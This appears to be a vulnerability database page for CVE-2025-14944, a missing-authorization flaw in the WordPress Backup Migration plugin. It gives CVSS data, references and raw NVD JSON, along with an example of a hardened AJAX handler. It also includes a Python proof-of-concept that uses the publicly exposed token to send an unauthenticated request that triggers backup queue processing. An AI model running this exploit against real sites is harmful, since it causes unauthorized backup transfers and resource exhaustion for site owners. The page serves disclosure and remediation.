Security Vulnerability Report
CVE-2025-14944 CVSS 5.3 MEDIUM

CVE-2025-14944

Published: 2026-04-07 17:16:26
Last Modified: 2026-04-27 19:04:23

Description

The Backup Migration plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.0.0. This is due to a missing capability check on the 'initializeOfflineAjax' function and lack of proper nonce verification. The endpoint only validates against hardcoded tokens which are publicly exposed in the plugin's JavaScript. This makes it possible for unauthenticated attackers to trigger the backup upload queue processing, potentially causing unexpected backup transfers to configured cloud storage targets and resource exhaustion.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Backup Migration <= 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"

# The hardcoded token is usually found in the plugin's JS files (e.g., offline.js)
# Example: var bm_token = "1234567890abcdef";
hardcoded_token = "REPLACE_WITH_ACTUAL_TOKEN_FROM_JS"

# Data payload based on vulnerable function
payload = {
    "action": "backup_migration_initialize_offline",
    "token": hardcoded_token,
    "backup_id": "trigger_exhaustion",  # Arbitrary data to trigger processing
}

headers = {
    "User-Agent": "CVE-2025-14944-PoC",
    "Content-Type": "application/x-www-form-urlencoded",
}

try:
    # Send unauthenticated POST request
    response = requests.post(target_url, data=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if backup processing started.")
        print(f"[+] Response: {response.text[:200]}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")
```
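The description names two missing controls on the AJAX handler: a capability check and nonce verification, with a static token from public JavaScript standing in for both. The following is an added example of what a correctly guarded WordPress admin-ajax handler looks like; it is not the plugin's own code, and the function, action and hook names (`bm_initialize_offline_ajax`, `bm_initialize_offline`, `bm_offline_action`, `bm_process_upload_queue`) are assumptions.

```php
<?php
// Added example of a hardened admin-ajax handler (not the plugin's code).
// Register only for logged-in users: no 'wp_ajax_nopriv_' hook is added,
// so unauthenticated requests never reach the handler at all.
add_action( 'wp_ajax_bm_initialize_offline', 'bm_initialize_offline_ajax' );

function bm_initialize_offline_ajax() {
    // 1. Authorization: the caller must hold an appropriate capability.
    //    A token embedded in public JS is not a secret and cannot replace this.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }

    // 2. CSRF protection: the request must carry a per-user, expiring nonce.
    //    check_ajax_referer() dies with a -1 response when the nonce is invalid.
    check_ajax_referer( 'bm_offline_action', 'nonce' );

    // 3. Only now touch state: validate input, then run the upload queue.
    $backup_id = isset( $_POST['backup_id'] )
        ? sanitize_text_field( wp_unslash( $_POST['backup_id'] ) )
        : '';
    if ( '' === $backup_id ) {
        wp_send_json_error( array( 'message' => 'Missing backup_id' ), 400 );
    }

    // bm_process_upload_queue() stands in for the plugin's real queue worker.
    $result = bm_process_upload_queue( $backup_id );
    wp_send_json_success( $result );
}

// The nonce is minted server side when the admin page is rendered, so the
// client sends a value tied to its own session rather than a constant:
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'bm-offline', 'bmOffline', array(
        'ajax_url' => admin_url( 'admin-ajax.php' ),
        'nonce'    => wp_create_nonce( 'bm_offline_action' ),
    ) );
} );
```

Both `wp_send_json_error()` and a failed `check_ajax_referer()` terminate the request, so the queue worker is only reached by an authenticated, authorized caller presenting a valid nonce.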

References

https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/ajax_offline.php#L112
https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/offline.php#L29
https://plugins.trac.wordpress.org/changeset?old=3386897&old_path=backup-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3449635&new_path=backup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/a2a41a15-0743-48cc-8c92-7cb839fa5847?source=cve

Weakness: CWE-862 (Missing Authorization)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14944",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T17:16:25.927",
    "lastModified": "2026-04-27T19:04:22.650",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Backup Migration plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.0.0. This is due to a missing capability check on the 'initializeOfflineAjax' function and lack of proper nonce verification. The endpoint only validates against hardcoded tokens which are publicly exposed in the plugin's JavaScript. This makes it possible for unauthenticated attackers to trigger the backup upload queue processing, potentially causing unexpected backup transfers to configured cloud storage targets and resource exhaustion."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-862" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/ajax_offline.php#L112",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/offline.php#L29",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?old=3386897&old_path=backup-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3449635&new_path=backup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a2a41a15-0743-48cc-8c92-7cb839fa5847?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```